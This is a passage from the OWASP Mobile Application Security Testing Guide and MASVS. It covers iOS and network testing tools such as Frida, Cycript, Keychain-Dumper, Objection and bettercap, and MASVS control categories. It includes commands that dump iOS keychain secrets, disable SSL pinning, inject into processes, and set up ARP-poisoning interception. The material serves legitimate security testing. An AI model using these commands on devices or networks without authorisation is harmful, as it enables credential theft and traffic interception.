Start Cydia and add Frida's repository by navigating to Manage -> Sources -> Edit -> Add and entering https://build.frida.re. You should then be able to find and install the Frida package.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#using-frida-on-ios","title":"Using Frida on iOS","text":"Connect your device via USB and make sure that Frida works by running the frida-ps
command and the flag '-U'. This should return the list of processes running on the device:
$ frida-ps -U\nPID Name\n--- ----------------\n963 Mail\n952 Safari\n416 BTServer\n422 BlueTool\n791 CalendarWidget\n451 CloudKeychainPro\n239 CommCenter\n764 ContactsCoreSpot\n(...)\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#frida-bindings","title":"Frida Bindings","text":"In order to extend the scripting experience, Frida offers bindings to programming languages such as Python, C, NodeJS, and Swift.
Taking Python as an example, the first thing to note is that no further installation steps are required. Start your Python script with import frida
and you're ready to go. See the following script that simply runs the previous JavaScript snippet:
# frida_python.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\nscript.load()\n\nsession.detach()\n
In this case, running the Python script (python3 frida_python.py
) has the same result as the previous example: it will print all methods of the android.view.View
class to the terminal. However, you might want to work with that data from Python. Using send
instead of console.log
will send data in JSON format from JavaScript to Python. Please read the comments in the example below:
# python3 frida_python_send.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\n# 1. we want to store method names inside a list\nandroid_view_methods = []\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n send(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\n\n# 2. this is a callback function, only method names containing \"Text\" will be appended to the list\ndef on_message(message, data):\n if \"Text\" in message['payload']:\n android_view_methods.append(message['payload'])\n\n# 3. we tell the script to run our callback each time a message is received\nscript.on('message', on_message)\n\nscript.load()\n\n# 4. we do something with the collected data, in this case we just print it\nfor method in android_view_methods:\n print(method)\n\nsession.detach()\n
This effectively filters the methods and prints only the ones containing the string \"Text\":
$ python3 frida_python_send.py\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic void android.view.View.setTextAlignment(int)\npublic void android.view.View.setTextDirection(int)\npublic void android.view.View.setTooltipText(java.lang.CharSequence)\n...\n
In the end, it is up to you to decide where would you like to work with the data. Sometimes it will be more convenient to do it from JavaScript and in other cases Python will be the best choice. Of course you can also send messages from Python to JavaScript by using script.post
. Refer to the Frida docs for more information about sending and receiving messages.
By running MobSF locally on a macOS host you'll benefit from a slightly better class-dump output.
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the IPA you want to analyze into the upload area and MobSF will start its job.
After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
Info.plist
file.Info.plist
which give some hints on the app's permissions.In contrast to the Android use case, MobSF does not offer any dynamic analysis features for iOS apps.
Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0041/","title":"nm - iOS","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find here more information for for iOS.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0042/","title":"BinaryCookieReader","text":"A tool to dump all the cookies from the binary Cookies.binarycookies file - https://github.com/as0ler/BinaryCookieReader/blob/master/BinaryCookieReader.py
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0043/","title":"class-dump","text":"class-dump by Steve Nygard is a command line utility for examining the Objective-C runtime information stored in Mach-O (Mach object) files. It generates declarations for the classes, categories, and protocols.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0044/","title":"class-dump-z","text":"class-dump-z is class-dump re-written from scratch in C++, avoiding the use of dynamic calls. Removing these unnecessary calls makes class-dump-z nearly 10 times faster than its predecessor.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0045/","title":"class-dump-dyld","text":"class-dump-dyld by Elias Limneos allows symbols to be dumped and retrieved directly from the shared cache, eliminating the necessity of extracting the files first. It can generate header files from app binaries, libraries, frameworks, bundles, or the whole dyld_shared_cache. Directories or the entirety of dyld_shared_cache can be recursively mass-dumped.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0046/","title":"Cycript","text":"Cydia Substrate (formerly called MobileSubstrate) is the standard framework for developing Cydia runtime patches (the so-called \"Cydia Substrate Extensions\") on iOS. It comes with Cynject, a tool that provides code injection support for C.
Cycript is a scripting language developed by Jay Freeman (aka Saurik). It injects a JavaScriptCore VM into a running process. Via the Cycript interactive console, users can then manipulate the process with a hybrid Objective-C++ and JavaScript syntax. Accessing and instantiating Objective-C classes inside a running process is also possible.
In order to install Cycript, first download, unpack, and install the SDK.
#on iphone\n$ wget https://cydia.saurik.com/api/latest/3 -O cycript.zip && unzip cycript.zip\n$ sudo cp -a Cycript.lib/*.dylib /usr/lib\n$ sudo cp -a Cycript.lib/cycript-apl /usr/bin/cycript\n
To spawn the interactive Cycript shell, run \"./cycript\" or \"cycript\" if Cycript is on your path.
$ cycript\ncy#\n
To inject into a running process, we first need to find the process ID (PID). Run the application and make sure the app is in the foreground. Running cycript -p <PID>
injects Cycript into the process. To illustrate, we will inject into SpringBoard (which is always running).
$ ps -ef | grep SpringBoard\n501 78 1 0 0:00.00 ?? 0:10.57 /System/Library/CoreServices/SpringBoard.app/SpringBoard\n$ ./cycript -p 78\ncy#\n
One of the first things you can try out is to get the application instance (UIApplication
), you can use Objective-C syntax:
cy# [UIApplication sharedApplication]\ncy# var a = [UIApplication sharedApplication]\n
Use that variable now to get the application's delegate class:
cy# a.delegate\n
Let's try to trigger an alert message on SpringBoard with Cycript.
cy# alertView = [[UIAlertView alloc] initWithTitle:@\"OWASP MASTG\" message:@\"Mobile Application Security Testing Guide\" delegate:nil cancelButtonTitle:@\"OK\" otherButtonTitles:nil]\n#\"<UIAlertView: 0x1645c550; frame = (0 0; 0 0); layer = <CALayer: 0x164df160>>\"\ncy# [alertView show]\ncy# [alertView release]\n
Find the app's document directory with Cycript:
cy# [[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask][0]\n#\"file:///var/mobile/Containers/Data/Application/A8AE15EE-DC8B-4F1C-91A5-1FED35212DF/Documents/\"\n
The command [[UIApp keyWindow] recursiveDescription].toString()
returns the view hierarchy of keyWindow
. The description of every subview and sub-subview of keyWindow
is shown. The indentation space reflects the relationships between views. For example, UILabel
, UITextField
, and UIButton
are subviews of UIView
.
cy# [[UIApp keyWindow] recursiveDescription].toString()\n`<UIWindow: 0x16e82190; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x16e80ac0>; layer = <UIWindowLayer: 0x16e63ce0>>\n | <UIView: 0x16e935f0; frame = (0 0; 320 568); autoresize = W+H; layer = <CALayer: 0x16e93680>>\n | | <UILabel: 0x16e8f840; frame = (0 40; 82 20.5); text = 'i am groot!'; hidden = YES; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8f920>>\n | | <UILabel: 0x16e8e030; frame = (0 110.5; 320 20.5); text = 'A Secret Is Found In The ...'; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8e290>>\n | | <UITextField: 0x16e8fbd0; frame = (8 141; 304 30); text = ''; clipsToBounds = YES; opaque = NO; autoresize = RM+BM; gestureRecognizers = <NSArray: 0x16e94550>; layer = <CALayer: 0x16e8fea0>>\n | | | <_UITextFieldRoundedRectBackgroundViewNeue: 0x16e92770; frame = (0 0; 304 30); opaque = NO; autoresize = W+H; userInteractionEnabled = NO; layer = <CALayer: 0x16e92990>>\n | | <UIButton: 0x16d901e0; frame = (8 191; 304 30); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x16d90490>>\n | | | <UIButtonLabel: 0x16e72b70; frame = (133 6; 38 18); text = 'Verify'; opaque = NO; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e974b0>>\n | | <_UILayoutGuide: 0x16d92a00; frame = (0 0; 0 20); hidden = YES; layer = <CALayer: 0x16e936b0>>\n | | <_UILayoutGuide: 0x16d92c10; frame = (0 568; 0 0); hidden = YES; layer = <CALayer: 0x16d92cb0>>`\n
You can also use Cycript's built-in functions such as choose
which searches the heap for instances of the given Objective-C class:
cy# choose(SBIconModel)\n[#\"<SBIconModel: 0x1590c8430>\"]\n
Learn more in the Cycript Manual.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0047/","title":"Cydia","text":"Cydia is an alternative app store developed by Jay Freeman (aka \"saurik\") for jailbroken devices. It provides a graphical user interface and a version of the Advanced Packaging Tool (APT). You can easily access many \"unsanctioned\" app packages through Cydia. Most jailbreaks install Cydia automatically.
Many tools on a jailbroken device can be installed by using Cydia, which is the unofficial AppStore for iOS devices and allows you to manage repositories. In Cydia you should add (if not already done by default) the following repositories by navigating to Sources -> Edit, then clicking Add in the top left:
In case you are using the Sileo App Store, please keep in mind that the Sileo Compatibility Layer shares your sources between Cydia and Sileo, however, Cydia is unable to remove sources added in Sileo, and Sileo is unable to remove sources added in Cydia. Keep this in mind when you\u2019re trying to remove sources.
After adding all the suggested repositories above you can install the following useful packages from Cydia to get started:
installipa
and ipainstaller
which are both the same.Besides Cydia you can also ssh into your iOS device and you can install the packages directly via apt-get, like for example adv-cmds.
apt-get update\napt-get install adv-cmds\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0048/","title":"dsdump","text":"dsdump is a tool to dump Objective-C classes and Swift type descriptors (classes, structs, enums). It only supports Swift version 5 or higher and does not support ARM 32-bit binaries.
The following example shows how you can dump Objective-C classes and Swift type descriptors of an iOS application.
First verify if the app's main binary is a FAT binary containing ARM64:
$ otool -hv [APP_MAIN_BINARY_FILE]\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 39 5016 NOUNDEFS DYLDLINK TWOLEVEL PIE\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 38 5728 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
If yes, then we specify the \"--arch\" parameter to \"arm64\", otherwise it is not needed if the binary only contains an ARM64 binary.
# Dump the Objective-C classes to a temporary file\n$ dsdump --objc --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/OBJC.txt\n\n# Dump the Swift type descriptors to a temporary file if the app is implemented in Swift\n$ dsdump --swift --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/SWIFT.txt\n
You can find more information about the inner workings of dsdump and how to programmatically inspect a Mach-O binary to display the compiled Swift types and Objective-C classes in this article.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0049/","title":"Frida-cycript","text":"A fork of Cycript including a brand new runtime called Mj\u00f8lner powered by Frida. This enables frida-cycript to run on all the platforms and architectures maintained by frida-core - https://github.com/nowsecure/frida-cycript
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/","title":"Frida-ios-dump","text":"Frida-ios-dump is a Python script that helps you retrieve the decrypted version of an iOS app (IPA) from an iOS device. It supports both Python 2 and Python 3 and requires Frida running on your iOS device (jailbroken or not). This tool uses Frida's Memory API to dump the memory of the running app and recreate an IPA file. Because the code is extracted from memory, it is automatically decrypted.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/#alternatives","title":"Alternatives","text":"Bagbak is a Node.js script that decrypts the entire application, including its extensions. It serves the same purpose as frida-ios-dump, but you might find it easier to set up and more convenient for regular use.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0051/","title":"gdb","text":"A tool to perform runtime analysis of iOS applications - https://cydia.radare.org/pool/main/g/gdb/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0053/","title":"iOSbackup","text":"iOSbackup
is a Python 3 class that reads and extracts files from a password-encrypted iOS backup created by iTunes on Mac and Windows.
With ios-deploy you can install and debug iOS apps from the command line, without using Xcode. It can be installed via brew on macOS:
brew install ios-deploy\n
Alternatively:
git clone https://github.com/ios-control/ios-deploy.git\ncd ios-deploy/\nxcodebuild\ncd build/Release\n./ios-deploy\nln -s <your-path-to-ios-deploy>/build/Release/ios-deploy /usr/local/bin/ios-deploy\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0055/","title":"iProxy","text":"A tool used to connect via SSH to a jailbroken iPhone via USB - https://github.com/tcurdt/iProxy
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0056/","title":"Keychain-Dumper","text":"Keychain-dumper is an iOS tool to check which keychain items are available to an attacker once an iOS device has been jailbroken. The easiest way to get the tool is to download the binary from its GitHub repo and run it from your device:
$ git clone https://github.com/ptoomey3/Keychain-Dumper\n$ scp -P 2222 Keychain-Dumper/keychain_dumper root@localhost:/tmp/\n$ ssh -p 2222 root@localhost\niPhone:~ root# chmod +x /tmp/keychain_dumper\niPhone:~ root# /tmp/keychain_dumper\n
For usage instructions please refer to the Keychain-dumper GitHub page.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0057/","title":"lldb","text":"A debugger by Apple's Xcode used for debugging iOS applications - https://lldb.llvm.org/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0058/","title":"MachoOView","text":"MachoOView is a useful visual Mach-O file browser that also allows in-file editing of ARM binaries.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0059/","title":"optool","text":"optool is a tool which interfaces with MachO binaries in order to insert/remove load commands, strip code signatures, resign, and remove aslr.
To install it:
git clone https://github.com/alexzielenski/optool.git\ncd optool/\ngit submodule update --init --recursive\nxcodebuild\nln -s <your-path-to-optool>/build/Release/optool /usr/local/bin/optool\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0060/","title":"otool","text":"otool is a tool for displaying specific parts of object files or libraries. It works with Mach-O files and universal file formats.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0061/","title":"Grapefruit","text":"Grapefruit is an iOS app assessment tool that is using the Frida server on the iOS device and is abstracting many penetration testing tasks into a Web UI. It can be installed via npm
.
$ npm install -g igf\n$ grapefruit\nlistening on http://localhost:31337\n
When you execute the command grapefruit
a local server will be started on port 31337. Connect your jailbroken device with the Frida server running, or a non-jailbroken device with a repackaged app including Frida to your machine via USB. Once you click on the \"iPhone\" icon you will get an overview of all installed apps.
With Grapefruit it's possible to explore different kinds of information concerning an iOS app. Once you have selected the iOS app you can perform many tasks such as:
A program that can convert .plist files between a binary version and an XML version - https://www.theiphonewiki.com/wiki/Plutil
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0063/","title":"security","text":"security
is a macOS command to administer Keychains, keys, certificates and the Security framework.
Since iOS 11 jailbreaks are introducing Sileo, which is a new jailbreak app-store for iOS devices. The jailbreak Chimera for iOS 12 is also relying on Sileo as a package manager.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0065/","title":"simctl","text":"simctl is an Xcode tool that allows you to interact with iOS simulators via the command line to e.g. manage simulators, launch apps, take screenshots or collect their logs.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0066/","title":"SSL Kill Switch 3","text":"Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and macOS Apps - https://github.com/NyaMisty/ssl-kill-switch3
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0067/","title":"swift-demangle","text":"swift-demangle is an Xcode tool that demangles Swift symbols. For more information run xcrun swift-demangle -help
once installed.
SwiftShield is a tool that generates irreversible, encrypted names for your iOS project's objects (including your Pods and Storyboards). This raises the bar for reverse engineers and will produce less helpful output when using reverse engineering tools such as class-dump and Frida.
Warning: SwiftShield irreversibly overwrites all your source files. Ideally, you should have it run only on your CI server, and on release builds.
A sample Swift project is used to demonstrate the usage of SwiftShield.
/usr/local/bin
:cp swiftshield/swiftshield /usr/local/bin/\n
$ cd SwiftSecurity\n$ swiftshield -automatic -project-root . -automatic-project-file SwiftSecurity.xcodeproj -automatic-project-scheme SwiftSecurity\nSwiftShield 3.4.0\nAutomatic mode\nBuilding project to gather modules and compiler arguments...\n-- Indexing ReverseEngineeringToolsChecker.swift --\nFound declaration of ReverseEngineeringToolsChecker (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC)\nFound declaration of amIReverseEngineered (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC20amIReverseEngineeredSbyFZ)\nFound declaration of checkDYLD (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC9checkDYLD33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\nFound declaration of checkExistenceOfSuspiciousFiles (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC31checkExistenceOfSuspiciousFiles33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\n...\n
SwiftShield is now detecting class and method names and is replacing their identifiers with encrypted values.
In the original source code you can see all the class and method identifiers:
SwiftShield has now replaced all of them with encrypted values that leave no trace of the original name or intention of the class/method:
After executing swiftshield
a new directory will be created called swiftshield-output
. In this directory another directory is created with a timestamp in the folder name. This directory contains a text file called conversionMap.txt
, that maps the encrypted strings to their original values.
$ cat conversionMap.txt\n//\n// SwiftShield Conversion Map\n// Automatic mode for SwiftSecurity, 2020-01-02 13.51.03\n// Deobfuscate crash logs (or any text file) by running:\n// swiftshield -deobfuscate CRASH_FILE -deobfuscate_map THIS_FILE\n//\n\nViewController ===> hTOUoUmUcEZUqhVHRrjrMUnYqbdqWByU\nviewDidLoad ===> DLaNRaFbfmdTDuJCPFXrGhsWhoQyKLnO\nsceneDidBecomeActive ===> SUANAnWpkyaIWlGUqwXitCoQSYeVilGe\nAppDelegate ===> KftEWsJcctNEmGuvwZGPbusIxEFOVcIb\nDeny_Debugger ===> lKEITOpOvLWCFgSCKZdUtpuqiwlvxSjx\nButton_Emulator ===> akcVscrZFdBBYqYrcmhhyXAevNdXOKeG\n
This is needed for deobfuscating encrypted crash logs.
Another example project is available in SwiftShield's Github repo, that can be used to test the execution of SwiftShield.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0069/","title":"Usbmuxd","text":"usbmuxd is a socket daemon that monitors USB iPhone connections. You can use it to map the mobile device's localhost listening sockets to TCP ports on your host computer. This allows you to conveniently SSH into your iOS device without setting up an actual network connection. When usbmuxd detects an iPhone running in normal mode, it connects to the phone and begins relaying requests that it receives via /var/run/usbmuxd
.
Xcode is an Integrated Development Environment (IDE) for macOS that contains a suite of tools for developing software for macOS, iOS, watchOS, and tvOS. You can download Xcode for free from the official Apple website. Xcode will offer you different tools and functions to interact with an iOS device that can be helpful during a penetration test, such as analyzing logs or sideloading of apps.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0071/","title":"Xcode Command Line Tools","text":"After installing Xcode, in order to make all development tools available systemwide, it is recommended to install the Xcode Command Line Tools package. This will be handy during testing of iOS apps as some of the tools (e.g. objection) are also relying on the availability of this package. You can download it from the official Apple website or install it straight away from your terminal:
xcode-select --install\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0072/","title":"xcrun","text":"xcrun
can be used to invoke Xcode developer tools from the command-line, without having them in the path. For example, you may want to use it to locate and run swift-demangle or simctl.
Radare2 is a complete framework for reverse-engineering and analyzing binaries. The installation instructions can be found in the GitHub repository. To learn more on radare2 you may want to read the official radare2 book.
Learn more:
Objection offers several features specific to iOS. You can find the full list of features on the project's page, but here are a few interesting ones:
All these tasks and more can be easily done by using the commands in objection's REPL. For example, you can obtain the classes used in an app, functions of classes or information about the bundles of an app by running:
OWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list classes\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list class_methods <ClassName>\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios bundles list_bundles\n
If you have a jailbroken device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to jailbreak the latest version of iOS, or you may have an application with advanced jailbreak detection mechanisms.
The ability to perform advanced dynamic analysis on non-jailbroken devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or get around basic security controls.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0074/#using-objection-on-ios","title":"Using Objection on iOS","text":"Starting up Objection depends on whether you've patched the IPA or whether you are using a jailbroken device running Frida-server. For running a patched IPA, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched IPA\n$ objection explore\n\n# Using frida-ps to get the correct application name\n$ frida-ps -Ua | grep -i Telegram\n983 Telegram\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"Telegram\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ ios sslpinning disable\n\n# Dump the Keychain\n$ ios keychain dump\n\n# Dump the Keychain, including access modifiers. The result will be written to the host in myfile.json\n$ ios keychain dump --json <myfile.json>\n\n# Show the content of a plist file\n$ ios plist cat <myfile.plist>\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0101/","title":"codesign","text":"The codesign tool is primarily used to create, verify, and display code signatures, and to query the dynamic status of signed code in the system. Although Xcode typically automates the process of signing code during builds and before distribution, there are scenarios where manual intervention with codesign is required. This can include inspecting or verifying the details of an app's code signature, or manually re-signing an app. For more detailed tasks such as these, you can use the codesign command line tool directly, as described in Apple's Code Signing Guide.
Learn more:
A command line packet capture utility for Android.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0076/","title":"bettercap","text":"A powerful framework which aims to offer to security researchers and reverse engineers an easy to use, all-in-one solution for Wi-Fi, Bluetooth Low Energy, wireless HID hijacking and Ethernet networks reconnaissance. It can be used during network penetration tests in order to simulate a man-in-the-middle (MITM) attack. This is achieved by executing ARP poisoning or spoofing to the target computers. When such an attack is successful, all packets between two computers are redirected to a third computer that acts as the man-in-the-middle and is able to intercept the traffic for analysis.
bettercap is a powerful tool to execute MITM attacks and should be preferred nowadays, instead of ettercap. See also Why another MITM tool? on the bettercap site.
bettercap is available for all major Linux and Unix operating systems and should be part of their respective package installation mechanisms. You need to install it on your host computer that will act as the MITM. On macOS it can be installed by using brew.
brew install bettercap\n
For Kali Linux you can install bettercap with apt-get
:
apt-get update\napt-get install bettercap\n
There are installation instructions as well for Ubuntu Linux 18.04 on LinuxHint.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0077/","title":"Burp Suite","text":"Burp Suite is an integrated platform for performing security testing of mobile and web applications.
Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web servers. Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your device and host computer are connected to a Wi-Fi network that permits client-to-client traffic.
PortSwigger provides good tutorials on setting up both Android and iOS devices to work with Burp:
Please refer to the section \"Setting up an Interception Proxy\" in the Android and iOS \"Basic Security Testing\" chapters for more information.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0078/","title":"MITM Relay","text":"A script to intercept and modify non-HTTP protocols through Burp and others with support for SSL and STARTTLS interception - https://github.com/jrmdev/mitm_relay
"},{"location":"MASTG/tools/network/MASTG-TOOL-0079/","title":"OWASP ZAP","text":"OWASP ZAP (Zed Attack Proxy) is a free security tool which helps to automatically find security vulnerabilities in web applications and web services.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0080/","title":"tcpdump","text":"A command line packet capture utility - https://www.tcpdump.org/
"},{"location":"MASTG/tools/network/MASTG-TOOL-0081/","title":"Wireshark","text":"An open-source packet analyzer - https://www.wireshark.org/download.html
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/","title":"mitmproxy","text":"mitmproxy is a free and open source interactive HTTPS intercepting proxy.
mitmdump
is the command-line version of mitmproxy. Think tcpdump for HTTP. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols. You can prettify and decode a variety of message types ranging from HTML to Protobuf, intercept specific messages on-the-fly, modify them before they reach their destination, and replay them to a client or server later on.mitmweb
is a web-based interface for mitmproxy. It gives you a similar experience as in Chrome's DevTools, plus additional features such as request interception and replay.brew install mitmproxy\n
The installation instructions are here.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/#usage","title":"Usage","text":"The documentation is here. Mitmproxy starts as a regular HTTP proxy by default and listens on http://localhost:8080
. You need to configure your browser or device to route all traffic through mitmproxy. For example, on Android emulator you need to follow the steps indicated here.
For example, to capture all traffic to a file:
mitmdump -w outfile\n
This runs mitmproxy with the add_header.py script, which simply adds a new header to all responses.
mitmdump -s add_header.py\n
"},{"location":"MASVS/","title":"OWASP MASVS","text":"GitHub Repo
The OWASP MASVS (Mobile Application Security Verification Standard) is the industry standard for mobile app security. It can be used by mobile software architects and developers seeking to develop secure mobile applications, as well as security testers to ensure completeness and consistency of test results.
Download the MASVS
Starting with MASVS v2.0.0, translations will no longer be included to focus on the development of MASTG v2.0.0. We encourage the community to create and maintain their own translations. Thank you to all the past translators who generously volunteered their time and expertise to make the MASVS accessible to non-English speaking communities. We truly appreciate your contributions and hope to continue working together in the future. The past MASVS v1.5.0 translations are still available in the MASVS repo.
"},{"location":"MASVS/#the-masvs-control-groups","title":"The MASVS Control Groups","text":"The standard is divided into various groups of controls, labeled MASVS-XXXXX, that represent the most critical areas of the mobile attack surface:
To complement the MASVS, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG) and the OWASP MAS Checklist which together are the perfect companion for verifying the controls listed in the OWASP MASVS and demonstrate compliance.
MAS Testing Profiles
Starting on v2.0.0 the MASVS does not contain \"verification levels\". The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. While we move things around and as a temporary measure, the OWASP MAS Checklist will still contain the old verification levels, associated with the current MASTG v1 tests. However, note that the levels will be completely reworked and reassigned to the corresponding MASTG tests in the next release.
"},{"location":"MASVS/05-MASVS-STORAGE/","title":"MASVS-STORAGE: Storage","text":"Mobile applications handle a wide variety of sensitive data, such as personally identifiable information (PII), cryptographic material, secrets, and API keys, that often need to be stored locally. This sensitive data may be stored in private locations, such as the app's internal storage, or in public folders that are accessible by the user or other apps installed on the device. However, sensitive data can also be unintentionally stored or exposed to publicly accessible locations, typically as a side-effect of using certain APIs or system capabilities such as backups or logs.
This category is designed to help developers ensure that any sensitive data intentionally stored by the app is properly protected, regardless of the target location. It also covers unintentional leaks that can occur due to improper use of APIs or system capabilities.
"},{"location":"MASVS/06-MASVS-CRYPTO/","title":"MASVS-CRYPTO: Cryptography","text":"Cryptography is essential for mobile apps because mobile devices are highly portable and can be easily lost or stolen. This means that an attacker who gains physical access to a device can potentially access all the sensitive data stored on it, including passwords, financial information, and personally identifiable information. Cryptography provides a means of protecting this sensitive data by encrypting it so that it cannot be easily read or accessed by an unauthorized user.
The purpose of the controls in this category is to ensure that the verified app uses cryptography according to industry best practices, which are typically defined in external standards such as NIST.SP.800-175B and NIST.SP.800-57. This category also focuses on the management of cryptographic keys throughout their lifecycle, including key generation, storage, and protection. Poor key management can compromise even the strongest cryptography, so it is crucial for developers to follow the recommended best practices to ensure the security of their users' sensitive data.
"},{"location":"MASVS/07-MASVS-AUTH/","title":"MASVS-AUTH: Authentication and Authorization","text":"Authentication and authorization are essential components of most mobile apps, especially those that connect to a remote service. These mechanisms provide an added layer of security and help prevent unauthorized access to sensitive user data. Although the enforcement of these mechanisms must be on the remote endpoint, it is equally important for the app to follow relevant best practices to ensure the secure use of the involved protocols.
Mobile apps often use different forms of authentication, such as biometrics, PIN, or multi-factor authentication code generators, to validate user identity. These mechanisms must be implemented correctly to ensure their effectiveness in preventing unauthorized access. Additionally, some apps may rely solely on local app authentication and may not have a remote endpoint. In such cases, it is critical to ensure that local authentication mechanisms are secure and implemented following industry best practices.
The controls in this category aim to ensure that the app implements authentication and authorization mechanisms securely, protecting sensitive user information and preventing unauthorized access. It is important to note that the security of the remote endpoint should also be validated using industry standards such as the OWASP Application Security Verification Standard (ASVS).
"},{"location":"MASVS/08-MASVS-NETWORK/","title":"MASVS-NETWORK: Network Communication","text":"Secure networking is a critical aspect of mobile app security, particularly for apps that communicate over the network. In order to ensure the confidentiality and integrity of data in transit, developers typically rely on encryption and authentication of the remote endpoint, such as through the use of TLS. However, there are numerous ways in which a developer may accidentally disable the platform secure defaults or bypass them entirely by utilizing low-level APIs or third-party libraries.
This category is designed to ensure that the mobile app sets up secure connections under any circumstances. Specifically, it focuses on verifying that the app establishes a secure, encrypted channel for network communication. Additionally, this category covers situations where a developer may choose to trust only specific Certificate Authorities (CAs), which is commonly referred to as certificate pinning or public key pinning.
